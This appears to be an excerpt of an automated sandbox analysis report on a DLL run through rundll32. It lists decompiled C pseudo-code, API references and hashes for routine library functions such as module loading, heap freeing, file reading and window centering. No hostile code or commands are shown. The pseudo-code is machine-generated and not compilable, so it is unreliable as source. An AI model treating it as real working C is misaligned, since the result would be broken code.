				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E1002695A(0x104, _t30, _t33,  &_v276);
					}
				}
				return E10011A49(_t13, _v8);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10026C62
PathFindExtensionA.SHLWAPI(?), ref: 10026C79
lstrcpyA.KERNEL32(00000000,?), ref: 10026CA3

Part of subcall function 1002695A: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1002697D
Part of subcall function 1002695A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026988
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269B9
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269C1
Part of subcall function 1002695A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100269CE
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269E8
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100269EE

Strings

%s.dll, xrefs: 10026C7F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
String ID: %s.dll
API String ID: 4178508759-3668843792
Opcode ID: e8c980b1039220e988ec9f22b9c2f2a1de109ad4e605125d8e761b797a12fc31
Instruction ID: fe4ede24a9b99154f839b1d0cfe838e7aebc8168d852c36c17edc46dfd30288e
Opcode Fuzzy Hash: e8c980b1039220e988ec9f22b9c2f2a1de109ad4e605125d8e761b797a12fc31
Instruction Fuzzy Hash: A601487590011DABDB19EBA4DC869FE77BCFB4C304F5445B9EA15E3100D6B09A498B50

Uniqueness

Uniqueness Score: -1.00%

Function 10019F98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E10019F98(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x1002f940);
				E10012CE0(_t13, _t14, _t15);
				_t9 =  *0x1003a614;
				if(_t9 == 0) {
					if( *0x1003a174 == 1) {
						L4:
						_t9 = E10019F88;
						 *0x1003a614 = E10019F88;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1003a614 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E10012D1B(_t10);
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,1002F940,00000010,10014C8F,00000000,00000FA0,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10019FBB
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 10019FCB

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 10019FC5
kernel32.dll, xrefs: 10019FB6

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: 7b6102adf88afe27ab1b66b00692691c4c0e6c3a29a4adb24f3e892c881cca1b
Instruction ID: e989f7d5d44f7413eed177191cab4c32822d07402e6d3f292b4702f0490579e7
Opcode Fuzzy Hash: 7b6102adf88afe27ab1b66b00692691c4c0e6c3a29a4adb24f3e892c881cca1b
Instruction Fuzzy Hash: 89F03A74A00216BBEB11CFA08D49B8C3AE4EB25795B500129E511EE171D738D6C29B65

Uniqueness

Uniqueness Score: -1.00%

Function 10018F16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E10018F16() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x1002f748;
					_v20 =  *0x1002f740;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x1002f738]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,100132A6), ref: 10018F1B
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10018F2B

Strings

IsProcessorFeaturePresent, xrefs: 10018F25
KERNEL32, xrefs: 10018F16

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 84d8b145f530cb8c138a2747299701ee52cd4c12d2a6971b5621ca1a725f1d01
Instruction ID: 1bee355d24f708520efd17075276de4fa12d24f3c42a4f7eeaabd267be092e47
Opcode Fuzzy Hash: 84d8b145f530cb8c138a2747299701ee52cd4c12d2a6971b5621ca1a725f1d01
Instruction Fuzzy Hash: 66C01220658602D1E95097A10C48B191198FB147C2F500428A906E8050CF20C74D9620

Uniqueness

Uniqueness Score: -1.00%

Function 100045C0 Relevance: 6.2, APIs: 4, Instructions: 202
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E100045C0() {
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t66;
				intOrPtr _t69;
				signed int _t70;
				void* _t72;
				signed int _t94;
				signed int _t95;
				intOrPtr _t104;
				signed int _t110;
				signed int _t115;
				signed int _t118;
				signed int _t120;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t137;
				void* _t147;
				signed int _t148;
				intOrPtr _t149;
				signed int _t154;
				signed int _t155;
				signed int _t157;
				void* _t162;
				void* _t163;
				void* _t209;
				void* _t210;

				_t162 =  *(_t209 + 8);
				if(_t162 != 0) {
					_t2 = _t162 + 0x10; // 0xdb852858
					if( *_t2 != 0) {
						_t3 = _t162 + 4; // 0xc0335d5e
						_t69 =  *_t3;
						_t124 =  *0x1003611c; // 0x0
						_t70 =  *0x1003610c; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t162 + 0x28)) + _t69 + _t124 + _t70))(_t69, 0, 0);
					}
					_t110 =  *0x10036120; // 0x0
					_t125 =  *0x1003610c; // 0x0
					_t51 =  *0x10036118; // 0x0
					_t148 =  *0x10036114; // 0x0
					_t53 =  *0x10036110; // 0x0
					_t10 = _t53 * 2; // 0x3
					_t12 = _t162 + 0x30; // 0x8b100361
					 *0x10038154( *_t12 + ((_t110 - _t125 - 1) * _t51 +  *0x1003611c + (_t148 - _t110) * 2 + ((_t110 - _t125 - 1) * _t51 +  *0x1003611c + (_t148 - _t110) * 2) * 2 + ((3 - _t51 * _t125 + _t51 * _t125 * 2) * _t148 + _t53 + _t10 + 3) * _t53) * 8, _t147, _t163, _t72);
					_t17 = _t162 + 8; // 0x4cc4835b
					_t210 = _t209 + 4;
					if( *_t17 == 0) {
						L9:
						_t43 = _t162 + 4; // 0xc0335d5e
						_t149 =  *_t43;
						if(_t149 != 0) {
							_t44 = _t162 + 0x34; // 0xc2af0fc1
							_t128 =  *0x10036118; // 0x0
							_t115 =  *0x1003610c; // 0x0
							_t60 =  *0x10036120; // 0x0
							_t47 = _t60 + 1; // 0x1
							_t61 =  *0x1003611c; // 0x0
							 *((intOrPtr*)(_t162 + 0x20))(_t149, 0, ((_t128 | 0xffffffff) - _t115) *  *0x10036110 - (_t60 * _t128 +  *0x1003611c + _t115 * _t115 + 3) * _t128 + _t47 * _t60 -  *0x10036114 - _t61 + 0x8000,  *_t44);
						}
						return HeapFree(GetProcessHeap(), 0, _t162);
					} else {
						_t63 =  *0x1003611c; // 0x0
						_t118 =  *0x10036120; // 0x0
						_t137 =  *0x10036118; // 0x0
						_t120 =  *0x1003610c; // 0x0
						_t154 =  *0x10036120; // 0x0
						_t18 = _t162 + 0xc; // 0x8b068bc3
						_t94 =  *0x10036114; // 0x0
						 *(_t210 + 0x14) = 0;
						if((_t137 - _t118 * _t63 -  *0x10036110 - 1) * _t137 + (_t120 - _t63 * _t63 * _t120 + 1) * _t154 - _t63 +  *_t18 +  *0x10036110 + _t94 + _t120 <= 0) {
							L8:
							_t95 =  *0x10036110; // 0x0
							_t40 = _t162 + 8; // 0x4cc4835b
							 *0x10038154( *_t40 + (_t137 - _t63 + _t63 * 2 - _t95 + _t120) * 4);
							_t210 = _t210 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t155 =  *0x10036114; // 0x0
							_t157 =  *0x10036120; // 0x0
							_t25 = _t162 + 8; // 0x4cc4835b
							_t104 =  *_t25;
							if( *((intOrPtr*)(_t104 + ( *(_t210 + 0x14) + ((_t94 - _t137 * _t120 + 1) * _t63 + (1 - _t154) *  *0x10036110 - _t155 + _t155 - _t157 + _t157 * 2 - _t137 + _t120) * 2) * 4)) != 0) {
								_t28 = _t162 + 0x34; // 0xc2af0fc1
								_t66 =  *0x10036114; // 0x0
								 *((intOrPtr*)(_t162 + 0x2c))( *((intOrPtr*)(_t104 + ((1 - _t63) *  *0x10036110 + _t66 * _t120 - _t157 + _t157 + _t137 +  *((intOrPtr*)(_t210 + 0x18))) * 4)),  *_t28);
								_t120 =  *0x1003610c; // 0x0
								_t63 =  *0x1003611c; // 0x0
								_t137 =  *0x10036118; // 0x0
								_t157 =  *0x10036120; // 0x0
								_t210 = _t210 + 8;
							}
							 *(_t210 + 0x14) =  *(_t210 + 0x14) + 1;
							_t154 =  *0x10036120; // 0x0
							_t36 = _t162 + 0xc; // 0x8b068bc3
							_t94 =  *0x10036114; // 0x0
						} while ( *(_t210 + 0x14) < (_t137 - _t157 * _t63 -  *0x10036110 - 1) * _t137 + (_t120 - _t63 * _t63 * _t120 + 1) * _t154 - _t63 +  *_t36 +  *0x10036110 + _t94 + _t120);
						goto L8;
					}
				}
				return _t49;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 1000464D
??3@YAXPAX@Z.MSVCRT ref: 100047BE
GetProcessHeap.KERNEL32(00000000,10005AAE), ref: 10004830
HeapFree.KERNEL32(00000000), ref: 10004837

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ??3@Heap$FreeProcess
String ID:
API String ID: 834397476-0
Opcode ID: 90c6ab159d29352df5b5bb154c862e06b96acb7d9c6baf81e13f869300bda1ee
Instruction ID: ad28b38bd3c08bbb3fc4f9e0d514c77970a45c35d1c704a94450a7462f44718a
Opcode Fuzzy Hash: 90c6ab159d29352df5b5bb154c862e06b96acb7d9c6baf81e13f869300bda1ee
Instruction Fuzzy Hash: F771B6716403198FD309DFA8CEC6A51B7A9F78E200F09C539D9018F3A7EAB4B905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED7C Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E1000ED7C(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011A8C(E1002ACBA, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1002d9e4;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x1002fca8);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x1002fde8);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001D876(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DE59(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E1000A27F( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E1000A27F(_t162);
							_push(_t162);
							L1001F54A(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000EAFE(_t163, _t196);
							_push(_t163);
							L1001F54A(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001D95E( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10007404(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001D876( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F54A(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F54A(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}

APIs

__EH_prolog.LIBCMT ref: 1000ED81
VariantClear.OLEAUT32(?), ref: 1000EE37
CoTaskMemFree.OLE32(?), ref: 1000EEE4
CoTaskMemFree.OLE32(?), ref: 1000EEF2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: afa6c20de34ed5f3fa211c7dbc173508223aefaae08f34650159bba21e88455d
Instruction ID: 23eb7ccec880251b59bab8763a819f9e2e85fb578e8740f3f9367a1fc10412e0
Opcode Fuzzy Hash: afa6c20de34ed5f3fa211c7dbc173508223aefaae08f34650159bba21e88455d
Instruction Fuzzy Hash: 12713875A00696CFDB20DFA8C9C486AB7F2FF48384761096DE146AB665CB31FD81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B75C Relevance: 6.2, APIs: 4, Instructions: 167
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B75C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1003a6c0 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001A023(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013380(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E1001336E())) = 9;
					_t107 = E10013377();
					 *_t107 = _t129;
					goto L10;
				}
			}

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,1002EFE8,?,?), ref: 1001B7D6
GetLastError.KERNEL32 ref: 1001B7E0
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 1001B8A9
GetLastError.KERNEL32 ref: 1001B8B3

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 7da25d244e6440bd7236263eb551815ef0c0b4a4bf8a5dd15079a7f91dc11e2d
Instruction ID: 0a4bd949ddde782393144a75d5cee989dcea459c0babb1fb25f56f12e98d1827
Opcode Fuzzy Hash: 7da25d244e6440bd7236263eb551815ef0c0b4a4bf8a5dd15079a7f91dc11e2d
Instruction Fuzzy Hash: 1161A130A04B8A9FDB21CF64C880B9D7BF4FF06754F154099E9618F292DB70DA96CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000E95C Relevance: 6.2, APIs: 4, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1000E95C(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				intOrPtr _t137;
				void* _t138;

				_t126 = __edx;
				_t136 = __ecx;
				_t130 = E1002174E( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E10020A8C(_t138, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E10022A95(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E10022AD3(_t130, 1);
				}
